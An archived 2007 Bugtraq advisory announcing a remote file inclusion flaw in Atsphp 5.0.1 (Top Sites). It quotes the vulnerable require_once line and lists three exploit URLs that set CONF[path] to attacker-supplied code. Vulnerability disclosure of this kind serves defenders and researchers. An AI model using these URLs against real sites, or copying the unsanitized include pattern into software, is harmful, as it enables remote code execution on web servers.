lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20070130113031.3446.qmail@securityfocus.com>
Date: 30 Jan 2007 11:30:31 -0000
From: trzindan@...mail.fr
To: bugtraq@...urityfocus.com
Subject: Atsphp 5.0.1 [Top Sites] [index.php] - Remote File Include


########################################################################
#
# Atsphp 5.0.1 [Top Sites] [index.php] - Remote File Include 
# Download Source : http://scripts.ringsworld.com/top-sites/atsphp-5.0.1.zip
#
# Found By : Tr_ZiNDaN
# Location : TurkeY -- #trzindan (at) hotmail (dot) fr [email concealed]
########################################################################

file ;
index.php
sources/usercp.php
sources/admin.php

########################################################################

bugs ;

require_once("{$CONF['path']}/sources/misc/classes.php");


########################################################################
exp;
/atsphp-5.0.1/index.php?CONF[path]=evilcode?
/atsphp-5.0.1/sources/usercp.php?CONF[path]=evilcode?
/atsphp-5.0.1/sources/admin.php?CONF[path]=evilcode?

########################################################################

Thanks;
Crackers_Child,str0ke,EL_MuHaMMeD,CyberWolf,EntRika,Blackwolf,,KurtEfendy

Canberx,Chaos,C0ld_Z3r0,Arslan,H0tturk,Sehzade,XYU,Paradox_ MusLim Hackers

########################################################################

T3k T4b4nC4 2oo7~

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ